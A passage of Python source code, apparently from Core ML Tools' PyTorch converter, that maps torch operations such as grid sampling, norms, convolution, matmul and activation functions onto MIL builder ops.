https://github.com/pytorch/pytorch/blob/00d432a1ed179eff52a9d86a0630f623bf20a37a/aten/src/ATen/native/GridSampler.h#L10-L11\n m_mode = {0: \"bilinear\", 1: \"nearest\"}\n m_padding_mode = {0: \"constant\", 1: \"border\", 2: \"reflection\"}\n\n # add `resample` if grid/coordinates is in input, otherwise,\n # add `affine` to generate grid from `affine_grid_generator`.\n if affine_op_name in context: # add `resample` op\n inputs = _get_inputs(context, node, expected=5)\n sampling_mode = m_mode[inputs[2].val]\n padding_mode = m_padding_mode[inputs[3].val]\n align_corners = inputs[4].val\n\n # When align_corners=False, padding_mode is corresponding to Core ML's symmetric\n if padding_mode == \"reflection\" and align_corners is False:\n padding_mode = \"symmetric\"\n\n x = mb.resample(\n x=inputs[0],\n coordinates=inputs[1],\n sampling_mode=sampling_mode,\n padding_mode=padding_mode,\n padding_value=0.0,\n coordinates_mode=\"normalized_minus_one_to_one\",\n align_corners=align_corners,\n name=node.name,\n )\n context.add(x)\n else: # add `affine` op instead\n x = context[node.inputs[0]]\n # inputs from `affine_grid_generator`\n affine_theta = context[\"{}_theta\".format(affine_op_name)]\n affine_size = context[\"{}_size\".format(affine_op_name)]\n affine_align_corners = context[\"{}_align_corners\".format(affine_op_name)]\n\n # affine_theta.val is either name string (dynamic input) or np.ndarray (static values)\n # see `affine_grid_generator` for details.\n is_theta_const = not isinstance(affine_theta.val, str)\n if is_theta_const:\n transform_matrix = _np.reshape(affine_theta.val, (affine_theta.shape[0], 6))\n else: # theta is dynamic input, add `reshape` op to PyMIL\n transform_matrix = mb.reshape(\n x=context[affine_theta.val],\n shape=(-1, 6),\n name=node.name + \"_theta_reshape\",\n )\n\n # inputs from `grid_sampler`\n sampling_mode = m_mode[context[node.inputs[2]].val]\n padding_mode = m_padding_mode[context[node.inputs[3]].val]\n align_corners = context[node.inputs[4]].val\n\n if sampling_mode != \"bilinear\":\n raise NotImplementedError(\"'sampling_mode' not supported.\")\n\n if padding_mode != \"constant\":\n raise NotImplementedError(\"'padding_mode' not supported.\")\n\n if affine_align_corners.val != align_corners:\n raise ValueError(\n \"Op 'affine_grid_generator' and 'grid_sampler' must agree on 'align_corners'.\"\n )\n\n x = mb.affine(\n x=x,\n transform_matrix=transform_matrix,\n output_height=affine_size.val[2],\n output_width=affine_size.val[3],\n sampling_mode=sampling_mode,\n padding_mode=padding_mode,\n padding_value=0.0,\n coordinates_mode=\"normalized_minus_one_to_one\",\n align_corners=align_corners,\n name=node.name,\n )\n context.add(x)\n\n\n@register_torch_op\ndef silu(context, node):\n inputs = _get_inputs(context, node, expected=1)\n x = mb.silu(x=inputs[0], name=node.name)\n context.add(x)\n\n\n@register_torch_op\ndef constant(context, node):\n assert len(node.inputs) == 0\n assert len(node.outputs) == 1\n\n name = node.name\n val = node.attr[\"value\"]\n\n const = _construct_constant(val, name)\n context.add(const, torch_name=name)\n\n\n@register_torch_op\ndef cosine_similarity(context, node):\n inputs = _get_inputs(context, node, expected=4)\n dim = inputs[-2].val\n eps = inputs[-1].val\n xy = mb.mul(x=inputs[0], y=inputs[1])\n sum_xy = mb.reduce_sum(x=xy, axes=[dim])\n\n xx = mb.mul(x=inputs[0], y=inputs[0])\n sum_xx = mb.reduce_sum(x=xx, axes=[dim])\n yy = mb.mul(x=inputs[1], y=inputs[1])\n sum_yy = mb.reduce_sum(x=yy, axes=[dim])\n\n mul_sum_xy = mb.mul(x=sum_xx, y=sum_yy)\n div_12 = mb.maximum(x=mul_sum_xy, y=eps * eps)\n div_sqrt = mb.sqrt(x=div_12)\n\n cs = mb.real_div(x=sum_xy, y=div_sqrt, name=node.name)\n context.add(cs)\n\n\n@register_torch_op\ndef selu(context, node):\n ALPHA = 1.6732632423543772\n SCALE = 1.0507009873554805\n\n x = _get_inputs(context, node, expected=1)[0]\n x = mb.elu(x=x, alpha=ALPHA)\n x = mb.mul(x=x, y=SCALE, name=node.name)\n context.add(x)\n\n\n@register_torch_op\ndef dot(context, node):\n inputs = _get_inputs(context, node, expected=2)\n xy = mb.mul(x=inputs[0], y=inputs[1])\n sum_xy = mb.reduce_sum(x=xy, axes=[0])\n context.add(sum_xy, node.name)\n\n\n@register_torch_op\ndef mv(context, node):\n inputs = _get_inputs(context, node, expected=2)\n expand = mb.expand_dims(x=inputs[1], axes=[-1], name=node.name + \"_expanded\")\n mv = mb.matmul(x=inputs[0], y=expand, name=node.name + \"_mv\")\n res = mb.squeeze(x=mv, axes=[-1], name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef outer(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x = mb.reshape(x=inputs[0], shape=[-1, 1])\n y = mb.reshape(x=inputs[1], shape=[1, -1])\n res = mb.matmul(x=x, y=y, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef cross(context, node):\n inputs = _get_inputs(context, node, expected=3)\n x = inputs[0]\n y = inputs[1]\n dim = inputs[2]\n\n x1 = mb.gather(x=x, indices=[1, 2, 0], axis=dim, name=\"x1\")\n x2 = mb.gather(x=x, indices=[2, 0, 1], axis=dim, name=\"x2\")\n y1 = mb.gather(x=y, indices=[1, 2, 0], axis=dim, name=\"y1\")\n y2 = mb.gather(x=y, indices=[2, 0, 1], axis=dim, name=\"y2\")\n m1 = mb.mul(x=x1, y=y2)\n m2 = mb.mul(x=x2, y=y1)\n z = mb.sub(x=m1, y=m2, name=node.name)\n context.add(z)\n\n\n@register_torch_op\ndef frobenius_norm(context, node):\n x, dim, keep_dims = _get_inputs(context, node, expected=3)\n result = mb.reduce_l2_norm(x=x, axes=dim, keep_dims=keep_dims, name=node.name)\n context.add(result)\n\n\n@register_torch_op\ndef norm(context, node):\n x, num, dim, keep_dims = _get_inputs(context, node, expected=4)\n assert x is not None and keep_dims is not None and num is not None and dim is not None\n temp = _vector_norm(x=x, order=num, dim=dim, keep_dims=keep_dims, name=node.name)\n context.add(temp)\n\n\ndef _vector_norm(x, order, dim, keep_dims, name):\n if order.val == 0:\n # sum(x!=0)\n x = mb.cast(x=x, dtype=\"fp32\")\n temp = mb.not_equal(x=x, y=0.)\n temp = mb.cast(x=temp, dtype='int32')\n temp = mb.reduce_sum(x=temp, axes=dim, keep_dims=keep_dims, name=name)\n elif order.val > VALUE_CLOSE_TO_INFINITY:\n # max(abs(x))\n temp = mb.abs(x=x)\n temp = mb.reduce_max(x=temp, axes=dim, keep_dims=keep_dims, name=name)\n elif order.val < -VALUE_CLOSE_TO_INFINITY:\n # min(abs(x))\n temp = mb.abs(x=x)\n temp = mb.reduce_min(x=temp, axes=dim, keep_dims=keep_dims, name=name)\n else:\n # sum(abs(x)^{order})^{(1 / order)}\n temp = mb.abs(x=x)\n x, y = promote_input_dtypes([temp, order.val])\n temp = mb.pow(x=x, y=y)\n temp = mb.reduce_sum(x=temp, axes=dim, keep_dims=keep_dims)\n temp = mb.pow(x=temp, y=1.0 / order.val, name=name)\n return temp\n\n@register_torch_op\ndef _weight_norm(context, node):\n v, g, dim = _get_inputs(context, node, expected=3)\n\n # Determine axes for L2 norm\n if dim.val == -1:\n axes = None\n else:\n axes = list(range(v.rank))\n dim = dim.val\n if dim >= 0:\n axes.remove(dim)\n else:\n axes.remove(v.rank + dim)\n\n # Calculate L2 norm of v\n temp = mb.pow(x=v, y=2.)\n temp = mb.reduce_sum(x=temp, axes=axes, keep_dims=True)\n norm = mb.pow(x=temp, y=1./2)\n\n inverse_norm = mb.inverse(x=norm)\n direction = mb.mul(x=v, y=inverse_norm)\n result = mb.mul(x=g, y=direction, name=node.name)\n context.add(result)\n\n\n\ndef _matrix_norm(x, order, dim, keep_dims, name):\n if order.val == 1:\n # min(sum(abs(x), dim=0))\n temp = mb.abs(x=x)\n temp = mb.reduce_sum(x=temp, axes=[dim[0]], keep_dims=True)\n temp = mb.reduce_max(x=temp, axes=dim, keep_dims=keep_dims, name=name)\n elif order.val == -1:\n # min(sum(abs(x), dim=0))\n temp = mb.abs(x=x)\n temp = mb.reduce_sum(x=temp, axes=[dim[0]], keep_dims=True)\n temp = mb.reduce_min(x=temp, axes=dim, keep_dims=keep_dims, name=name)\n elif order.val == \"fro\":\n # sum(x**2)**1/2\n temp = mb.reduce_l2_norm(x=x, axes=dim, keep_dims=keep_dims, name=name)\n elif order.val > VALUE_CLOSE_TO_INFINITY:\n # max(sum(abs(x), dim=1))\n temp = mb.abs(x=x)\n temp = mb.reduce_sum(x=temp, axes=[dim[1]], keep_dims=True)\n temp = mb.reduce_max(x=temp, axes=dim, keep_dims=keep_dims, name=name)\n elif order.val < -VALUE_CLOSE_TO_INFINITY:\n # min(sum(abs(x), dim=1))\n temp = mb.abs(x=x)\n temp = mb.reduce_sum(x=temp, axes=[dim[1]], keep_dims=True)\n temp = mb.reduce_min(x=temp, axes=dim, keep_dims=keep_dims, name=name)\n else:\n raise RuntimeError(\"Matrix norm is not defined for the current inputs\")\n return temp\n\n\n@register_torch_op\ndef narrow(context, node):\n x, dim, start, length = _get_inputs(context, node, expected=4)\n\n begin = [0] * len(x.shape)\n begin[dim.val] = start.val\n\n end = list(x.shape)\n end[dim.val] = start.val + length.val\n\n context.add(\n mb.slice_by_index(x=x, begin=begin, end=end, name=node.name)\n )\n\n\n@register_torch_op\ndef linalg_vector_norm(context, node):\n x, order, dim, keep_dims, _ = _get_inputs(context, node, expected=5)\n assert x is not None and keep_dims is not None and order is not None\n temp = _vector_norm(x=x, order=order, dim=dim, keep_dims=keep_dims, name=node.name)\n context.add(temp)\n\n\n@register_torch_op\ndef linalg_matrix_norm(context, node):\n x, order, dim, keep_dims, _ = _get_inputs(context, node, expected=5)\n assert x is not None and keep_dims is not None and order is not None and dim is not None\n assert len(dim.val) == 2\n temp = _matrix_norm(x=x, order=order, dim=dim.val, keep_dims=keep_dims, name=node.name)\n context.add(temp)\n\n\n@register_torch_op\ndef linalg_norm(context, node):\n x, order, dim, keep_dims, _ = _get_inputs(context, node, expected=5)\n assert x is not None and keep_dims is not None\n if dim is None:\n dim = _np.arange(x.rank)\n else:\n dim = dim.val\n if order is None:\n temp = mb.reduce_l2_norm(x=x, axes=dim, keep_dims=keep_dims, name=node.name)\n elif len(dim) == 2:\n temp = _matrix_norm(\n x=x, order=order, dim=dim, keep_dims=keep_dims, name=node.name\n )\n else:\n temp = _vector_norm(x=x, order=order, dim=dim, keep_dims=keep_dims, name=node.name)\n context.add(temp)\n\n\n@register_torch_op\ndef hardswish(context, node):\n inputs = _get_inputs(context, node, expected=1)\n x = inputs[0]\n\n w = mb.thresholded_relu(x=x, alpha=-3.0)\n y = mb.sigmoid_hard(\n x=w, alpha=1.0 / 6, beta=0.5\n ) # ``y = min(max(alpha * x + beta, -1), 1)\n result = mb.mul(x=w, y=y, name=node.name)\n\n context.add(result)\n\n\n@register_torch_op\ndef reshape_as(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x = inputs[0]\n ref = inputs[1]\n shape = mb.shape(x=ref)\n result = mb.reshape(x=x, shape=shape, name=node.name)\n context.add(result)\n\n\n@register_torch_op\ndef unflatten(context, node):\n x, dim_var, unflattened_size_var = _get_inputs(context, node, expected=3)\n x_shape = x.shape\n dim = dim_var.val\n unflattened_size = tuple(unflattened_size_var.val)\n assert x_shape is not None\n assert dim is not None\n assert unflattened_size is not None\n assert x_shape[dim] == _np.prod(unflattened_size)\n\n if dim < 0:\n dim += x.rank\n\n shape = x_shape[:dim] + unflattened_size + x_shape[dim + 1:]\n y = mb.reshape(x=x, shape=shape, name=node.name)\n context.add(y)\n\n\ndef _array_construct(context, node, array_type):\n assert len(node.outputs) == 1\n inputs = _get_inputs(context, node)\n scalar_inputs = [\n inp\n for inp in inputs\n if isinstance(inp, Var) and inp.can_be_folded_to_const() and len(inp.shape) == 0\n ]\n\n if len(scalar_inputs) == len(inputs):\n # All the list items are compile-time scalar constants, so let's create\n # a new const that concatenates them.\n val = array_type([inp.val for inp in inputs])\n const = mb.const(val=val, name=node.name)\n context.add(const)\n else:\n # If at least one input to the construct op is non-const, collect\n # the inputs and add them directly to the context. Ops that use this\n # node's output will take the list directly as input.\n context.add(array_type(inputs), node.name)\n\n\n@register_torch_op\ndef tupleconstruct(context, node):\n _array_construct(context, node, array_type=tuple)\n\n\n@register_torch_op\ndef listconstruct(context, node):\n _array_construct(context, node, array_type=list)\n\n\n@register_torch_op\ndef eq(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x = inputs[0]\n y = inputs[1]\n if is_bool(x.dtype):\n x = mb.cast(x=x, dtype=\"int32\")\n if is_bool(y.dtype):\n y = mb.cast(x=y, dtype=\"int32\")\n x, y = promote_input_dtypes([x, y])\n equal_to = mb.equal(x=x, y=y, name=node.name)\n context.add(equal_to)\n\n\n@register_torch_op\ndef ne(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x = inputs[0]\n y = inputs[1]\n if is_bool(x.dtype):\n x = mb.cast(x=x, dtype=\"int32\")\n if is_bool(y.dtype):\n y = mb.cast(x=y, dtype=\"int32\")\n x, y = promote_input_dtypes([x, y])\n equal_to = mb.not_equal(x=x, y=y, name=node.name)\n context.add(equal_to)\n\n\n@register_torch_op\ndef le(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x, y = promote_input_dtypes(inputs)\n less_equal = mb.less_equal(x=x, y=y, name=node.name)\n context.add(less_equal)\n\n\n@register_torch_op\ndef lt(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x, y = promote_input_dtypes(inputs)\n less = mb.less(x=x, y=y, name=node.name)\n context.add(less)\n\n\n@register_torch_op\ndef ge(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x, y = promote_input_dtypes(inputs)\n greater_equal = mb.greater_equal(x=x, y=y, name=node.name)\n context.add(greater_equal)\n\n\n@register_torch_op\ndef gt(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x, y = promote_input_dtypes(inputs[:2])\n greater = mb.greater(x=x, y=y, name=node.name)\n context.add(greater)\n\n\n@register_torch_op(torch_alias=[\"t\", \"numpy_t\"])\ndef transpose(context, node):\n assert len(node.outputs) == 1\n inputs = _get_inputs(context, node)\n x = inputs[0]\n\n if len(node.inputs) == 1:\n # PyTorch has several transpose ops that can be emitted. This one is only\n # emitted when .t() is called on a tensor, which means it can only be\n # called on a matrix.\n if len(x.shape) > 2:\n raise ValueError(\"transpose without dims for rank > 2 is unsupported\")\n res = mb.transpose(x=x, perm=[1, 0], name=node.name)\n else:\n assert len(inputs) == 3\n ax0 = inputs[1].val\n ax1 = inputs[2].val\n\n perm = list(range(len(x.shape)))\n perm[ax0] = ax1\n perm[ax1] = ax0\n\n res = mb.transpose(x=x, perm=perm, name=node.name)\n context.add(res)\n\n\n@register_torch_op(torch_alias=[\"permute\"])\ndef permute_copy(context, node):\n inputs = _get_inputs(context, node, expected=2)\n perm = mb.transpose(x=inputs[0], perm=inputs[1], name=node.name)\n context.add(perm)\n\n\n@register_torch_op\ndef frac(context, node):\n # Frac(x) = x - floor(abs(x)) * sign(x)\n\n x = _get_inputs(context, node, expected=1)[0]\n floor_abs = mb.floor(x=mb.abs(x=x))\n sign_abs_floor = mb.mul(x=floor_abs, y=mb.sign(x=x))\n res = mb.sub(x=x, y=sign_abs_floor)\n context.add(res, torch_name=node.name)\n\n\n@register_torch_op\ndef pixel_shuffle(context, node):\n inputs = _get_inputs(context, node, expected=2)\n perm = mb.pixel_shuffle(x=inputs[0], upscale_factor=inputs[1], name=node.name)\n context.add(perm)\n\n\n@register_torch_op\ndef pixel_unshuffle(context, node):\n inputs = _get_inputs(context, node, expected=2)\n downscale_factor = _np.uint32(inputs[1].val)\n perm = mb.pixel_unshuffle(x=inputs[0], downscale_factor=downscale_factor, name=node.name)\n context.add(perm)\n\n\n@register_torch_op(torch_alias=[\"bmm\", \"mm\"])\ndef matmul(context, node):\n inputs = _get_inputs(context, node, expected=2)\n if inputs[1].val is not None and \\\n len(inputs[1].shape) == 2 and len(inputs[0].shape) <= 3:\n res = mb.linear(x=inputs[0], weight=_np.transpose(inputs[1].val), name=node.name)\n else:\n x, y = promote_input_dtypes([inputs[0], inputs[1]])\n res = mb.matmul(x=x, y=y, name=node.name)\n context.add(res)\n\n\n@register_torch_op(torch_alias=[\"add.tensor\"])\ndef add(context, node):\n add_inputs = _get_inputs(context, node)\n assert len(node.outputs) == 1\n\n # TODO (sberardi): 3rd param to aten::add is a scale factor, need to handle that.\n # out=input+alpha x other\n # rdar://60175736\n if len(add_inputs) > 2 and add_inputs[2].val != 1:\n raise ValueError(\"ADD does not support scale factor param\")\n x, y = add_inputs[:2]\n if types.is_bool(x.dtype) and types.is_bool(y.dtype):\n add_node = mb.logical_or(x=x, y=y, name=node.name)\n elif types.is_complex(x.dtype) or types.is_complex(y.dtype):\n x_real = mb.complex_real(data=x) if types.is_complex(x.dtype) else x\n x_imag = mb.complex_imag(data=x) if types.is_complex(x.dtype) else 0.0\n y_real = mb.complex_real(data=y) if types.is_complex(y.dtype) else y\n y_imag = mb.complex_imag(data=y) if types.is_complex(y.dtype) else 0.0\n add_node = mb.complex(real_data=mb.add(x=x_real, y=y_real), imag_data=mb.add(x=x_imag, y=y_imag), name=node.name)\n else:\n x, y = promote_input_dtypes([x, y])\n add_node = mb.add(x=x, y=y, name=node.name)\n context.add(add_node)\n\n\n@register_torch_op\ndef cumsum(context, node):\n inputs = _get_inputs(context, node, expected=3)\n x = inputs[0]\n if is_bool(x.dtype):\n x = mb.cast(x=x, dtype='int32')\n res = mb.cumsum(x=x, axis=inputs[1], name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef addmm(context, node):\n # addmm(Tensor input, Tensor mat1, Tensor mat2, Scalar beta=1, Scalar alpha=1)\n # output = beta * input + alpha * mat1 * mat2\n\n assert len(node.outputs) == 1\n inputs = _get_inputs(context, node, expected=[3, 4, 5])\n bias = inputs[0]\n mat1 = inputs[1]\n mat2 = inputs[2]\n beta = inputs[3] if len(inputs) > 3 else mb.const(val=1.0)\n alpha = inputs[4] if len(inputs) > 4 else mb.const(val=1.0)\n\n if beta.val != 1.0:\n # Apply scaling factor beta to the bias.\n bias = mb.mul(x=beta, y=bias, name=bias.name + \"_scaled\")\n context.add(bias)\n\n if alpha.val != 1.0:\n # Apply scaling factor alpha to the input.\n mat1 = mb.mul(x=alpha, y=mat1, name=mat1.name + \"_scaled\")\n context.add(mat1)\n\n # MIL linear will transpose mat2, but addmm expects that mat1 and mat2\n # can multiply as is. So we add a transpose.\n mat2 = mb.transpose(x=mat2, perm=[1, 0], name=mat2.name + \"_transposed\")\n context.add(mat2)\n\n addmm_node = mb.linear(x=mat1, weight=mat2, bias=bias, name=node.name)\n context.add(addmm_node)\n\n\n@register_torch_op\ndef linear(context, node):\n inputs = _get_inputs(context, node, expected=[2, 3])\n x = inputs[0]\n W = inputs[1]\n x, W = promote_input_dtypes([x, W])\n bias = inputs[2] if len(node.inputs) == 3 else None\n res = _create_linear_layer(x, W, bias)\n context.add(res, torch_name=node.name)\n\n\n@register_torch_op(torch_alias=[\"conv2d\", \"convolution\"])\ndef _convolution(context, node):\n inputs = _get_inputs(context, node)\n\n x = inputs[0]\n # PyTorch and MIL has same weight layout\n # Conv: [Cout, Cin, *D]\n # ConvTranspose: [Cin, Cout, *D]\n weight = inputs[1]\n bias = inputs[2]\n strides = inputs[3]\n\n x, weight = promote_input_dtypes([x, weight])\n\n # Expand padding. Torch accepts either an int (for all dimensions) or an n-tuple of ints (one per dimension), but\n # we require a (2 * n)-tuple, where n is the number of spatial dimensions, start and end for each spatial dimension\n pad = inputs[4].val\n\n if len(weight.shape) in (3, 4):\n # 1D and 2D: Need to explicitly state L-R, T-B pad\n pad = _np.repeat(pad, 2)\n elif len(weight.shape) == 5:\n # 3D: Need to explicitly state F-Bk, L-R, T-B pad\n if type(pad) == int:\n pad = _np.repeat(pad, 6)\n elif len(pad) == 3:\n pad = _np.repeat(pad, 2)\n else:\n raise ValueError(\n \"Invalid weight dimension. Must be 3, 4, or 5 for 1D, 2D, or 3D convolution, respectively.\"\n )\n\n dilations = inputs[5]\n out_pad = None\n if len(inputs) >= 9:\n transposed = inputs[6].val\n out_pad = inputs[7].val\n group = inputs[8]\n elif len(inputs) == 7:\n transposed = False\n group = inputs[6]\n else:\n raise ValueError(\n \"unexpected number of inputs for node {} ({}): {}\".format(\n node.name, node.kind, len(inputs)\n )\n )\n\n kwargs = {\n \"x\": x,\n \"weight\": weight,\n \"strides\": strides,\n \"pad_type\": \"custom\",\n \"pad\": pad,\n \"dilations\": dilations,\n \"groups\": group,\n \"name\": node.name,\n }\n # Bias is optional in PyTorch's convolution.\n if bias is not None:\n kwargs[\"bias\"] = bias\n\n if transposed is True:\n # Transposed convolution\n # Handle output_padding using pre-pad or post-crop\n pre_pad = [0] * len(pad)\n post_crop = [0] * len(pad)\n\n if out_pad is not None and any(out_pad):\n output_padding = [0] * len(pad)\n # output padding adds additional padding on one of the side of dimension\n # i.e. bottom from top-bottom,\n # right from left-right\n # back from front-back\n # Core ML padding structure is similar [top, bottom, left, right]\n # mapping output_padding to simplify further processing!\n #\n # For ConvTranspose2d: [bottom, right] -> [0, b, 0, r]\n output_padding = [\n 0 if i % 2 == 0 else out_pad[i // 2] for i in range(len(pad))\n ]\n if sum(pad) == 0 and any(output_padding):\n raise ValueError(\n \"ConvTranspose configuration of padding=0 and output_padding > 0 not supported!\"\n )\n post_crop = pad.copy()\n pad *= 0\n for i in range(0, len(pad)):\n if post_crop[i] >= output_padding[i]:\n post_crop[i] -= output_padding[i]\n else:\n pre_pad[i] = output_padding[i] - post_crop[i]\n kwargs[\"pad\"] = pre_pad\n if any(pre_pad):\n # Constant pad requires pad to be of length 2*input_rank\n pre_pad = [0] * 2 * (len(x.shape) - 2) + pre_pad\n x = mb.pad(x=x, pad=pre_pad)\n kwargs[\"x\"] = x\n if any(post_crop):\n del kwargs[\"name\"]\n\n conv = mb.conv_transpose(**kwargs)\n if any(post_crop):\n # TODO: rdar://65575826 (PyTorch converter: output_padding mapping to slice\n # instead of crop layer for 1 and 3D ConvTranspose)\n if len(post_crop) == 2 and conv.rank == 3:\n # Number of elements to crop from right = post_crop[-1].\n # Since slicing supports negative indexing, end_id = -1 * post_crop[-1]\n conv = mb.slice_by_index(\n x=conv,\n begin=[0, 0, post_crop[0]],\n end=[0, 0, -1 * post_crop[-1]],\n begin_mask=[True, True, False],\n end_mask=[True, True, False],\n name=node.name,\n )\n elif len(post_crop) == 4 and conv.rank == 4:\n conv = mb.crop(\n x=conv,\n crop_height=post_crop[:2],\n crop_width=post_crop[2:4],\n name=node.name,\n )\n else:\n raise ValueError(\n \"output_padding is supported only for ConvTranspose1D or ConvTranspose2D!\"\n )\n else:\n # Normal convolution\n conv = mb.conv(**kwargs)\n context.add(conv)\n\n\n# Convolution with \"same, valid\" padding\n@register_torch_op\ndef _convolution_mode(context, node):\n inputs = _get_inputs(context, node, expected=7)\n mode = inputs[4].val\n\n context.add(\n mb.conv(\n x=inputs[0],\n weight=inputs[1],\n bias=inputs[2],\n strides=inputs[3],\n pad_type=mode,\n dilations=inputs[5],\n groups=inputs[6],\n name=node.name,\n )\n )\n\n\n@register_torch_op(torch_alias=[\"_softmax\"])\ndef softmax(context, node):\n inputs = _get_inputs(context, node)\n\n x = inputs[0]\n axis = inputs[1]\n res = mb.softmax(x=x, axis=axis, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef flatten(context, node):\n inputs = _get_inputs(context, node)\n\n x = inputs[0]\n dims = list(x.shape)\n start_val = inputs[1].val\n end_val = inputs[2].val\n\n start = len(dims) + start_val if start_val < 0 else start_val\n end = len(dims) + end_val if end_val < 0 else end_val\n\n if start > len(dims) or end > len(dims) or start < 0 or end < 0:\n raise ValueError(\n \"Invalid start and end. (start, end) == ({}, {})\".format(start, end_val)\n )\n if start > end:\n raise ValueError(\n \"Start must be before end. (start, end) == ({}, {})\".format(start, end_val)\n )\n x_shape = mb.shape(x=x)\n\n shape1 = mb.slice_by_index(x=x_shape, begin=[0], end=[start])\n shape2 = mb.slice_by_index(x=x_shape, begin=[end + 1], end=[len(dims)])\n\n flatten_dim = -1\n if not any_symbolic(x.shape):\n flatten_dim = 1\n for dim in dims[start: end + 1]:\n flatten_dim *= dim\n\n shape = mb.concat(values=(shape1, [flatten_dim], shape2), axis=0)\n shape = mb.cast(x=shape, dtype=\"int32\")\n reshape = mb.reshape(x=x, shape=shape, name=node.name)\n context.add(reshape)\n\n\n@register_torch_op\ndef _reshape_from_tensor(context, node):\n inputs = _get_inputs(context, node, expected=2)\n\n reshape = mb.reshape(x=inputs[0], shape=inputs[1], name=node.name)\n context.add(reshape)\n\n\n@register_torch_op\ndef softsign(context, node):\n inputs = _get_inputs(context, node, expected=1)\n\n res = mb.softsign(x=inputs[0], name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef relu(context, node):\n inputs = _get_inputs(context, node, expected=1)\n\n res = mb.relu(x=inputs[0], name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef prelu(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x = inputs[0]\n alpha = inputs[1]\n # In the MIL backend, it assumes that the inputs of prelu should have\n # at least rank 3, i.e. [batch, channel, spatial_dims*].\n if x.rank >= 2:\n alpha = alpha.val\n alpha = _np.ones((x.shape[1],)) * alpha\n\n if x.rank <= 2:\n axes = [1, 2] if x.rank == 1 else [2]\n x = mb.expand_dims(x=x, axes=axes)\n x = mb.prelu(x=x, alpha=alpha)\n res = mb.squeeze(x=x, axes=axes, name=node.name)\n else:\n res = mb.prelu(x=x, alpha=alpha, name=node.name)\n\n context.add(res)\n\n\n@register_torch_op\ndef linspace(context, node):\n inputs = _get_inputs(context, node, min_expected=3)\n\n start = inputs[0]\n end = inputs[1]\n nums = inputs[2]\n start = mb.cast(x=start, dtype=\"fp32\")\n end = mb.cast(x=end, dtype=\"fp32\")\n\n if start.can_be_folded_to_const() and end.can_be_folded_to_const() and nums.can_be_folded_to_const():\n start_val = start.val\n end_val = end.val\n nums_val = nums.val\n if nums_val < MAX_SIZE_CONSTANT_FOLDING:\n res = mb.const(val=_np.linspace(start_val, end_val, nums_val), name=node.name)\n context.add(res)\n return\n\n if nums.val is None:\n msg = \"Dynamic steps input for torch.linspace is not supported. Please use torch.arange instead\"\n raise NotImplementedError(msg)\n else:\n if nums.val == 1:\n res = mb.expand_dims(x=start, axes=[0], name=node.name)\n else:\n # step = (end - start) / (nums - 1)\n x = mb.sub(x=end, y=start)\n y = mb.sub(x=nums, y=1)\n x = mb.cast(x=x, dtype=\"fp32\")\n y = mb.cast(x=y, dtype=\"fp32\")\n step = mb.real_div(x=x, y=y)\n\n # Note that the range_1d op excluded the end point,\n # so we have to add the end back to the resulting array.\n arange = mb.range_1d(end=end, start=start, step=step)\n new_end = mb.expand_dims(x=end, axes=[0])\n res = mb.concat(values=[arange, new_end], axis=0, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef relu6(context, node):\n inputs = _get_inputs(context, node, expected=1)\n\n res = mb.relu6(x=inputs[0], name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef einsum(context, node):\n vars = context[node.inputs[1]]\n vars = promote_input_dtypes(vars)\n equation = context[node.inputs[0]].val\n x = build_einsum_mil(vars, equation, node.name)\n context.add(x)\n\n\n@register_torch_op\ndef eye(context, node):\n # TODO: rdar://104400568 ([PyTorch] Use MIL ops to construct the eye matrix in order to avoid directly folding the input into a const)\n inputs = _get_inputs(context, node, expected=[5, 6])\n if len(inputs) == 5:\n eye = _np.eye(inputs[0].val)\n if len(inputs) == 6:\n eye = _np.eye(inputs[0].val, inputs[1].val)\n eye = mb.const(val=eye, name=node.name)\n context.add(eye)\n\n\n@register_torch_op\ndef elu(context, node):\n ## Torch port to ATen adds scale and input_scale which is set to 1\n inputs = _get_inputs(context, node, expected=4)\n\n res = mb.elu(x=inputs[0], alpha=inputs[1], name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef leaky_relu(context, node):\n inputs = _get_inputs(context, node, expected=2)\n\n res = mb.leaky_relu(x=inputs[0], alpha=inputs[1], name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef rrelu(context, node):\n inputs = _get_inputs(context, node, expected=5)\n\n # Alpha in evaluation mode is just the average between upper and lower.\n lower_alpha = inputs[1]\n upper_alpha = inputs[2]\n alpha = (lower_alpha.val + upper_alpha.val) / 2\n\n res = mb.leaky_relu(x=inputs[0], alpha=alpha, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef softplus(context, node):\n inputs = _get_inputs(context, node, expected=3)\n x = inputs[0]\n beta_ = inputs[1].val\n C = x.shape[1]\n alpha_br = _np.repeat(1.0 / beta_, C).astype('float32')\n beta_br = _np.repeat(beta_, C).astype('float32')\n\n res = mb.softplus_parametric(x=x, alpha=alpha_br, beta=beta_br, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef mish(context, node):\n inputs = _get_inputs(context, node, expected=1)\n x = inputs[0]\n\n softplus = mb.softplus(x=x)\n tanh = mb.tanh(x=softplus)\n res = mb.mul(x=x, y=tanh, name=node.name)\n context.add(res)\n\n\ndef _adjust_pad_for_ceil_mode(input_shape, kernel_size, stride_sizes, pad_sizes):\n \"\"\" Given an input tensor and pooling parameters, add the extra input\n padding needed to replicate ceil_mode.\n MIL 3D pooling does not support ceil_mode natively, but we can\n workaround by padding the input appropriately.\n\n PyTorch output size formula for pooling:\n (reference: https://github.com/pytorch/pytorch/blob/375c30a7177442fb9d6de7516a9ae4031ae324c4/aten/src/ATen/native/Pool.h#L28)\n\n When ceil mode is True:\n out_dim = floor((in_dim + pad_l + pad_r - kernel_size + (stride-1)) / stride) + 1\n if (out_dim-1) * stride >= in_dim + pad_l and (pad_l > 0 or pad_r > 0):\n out_dim = out_dim 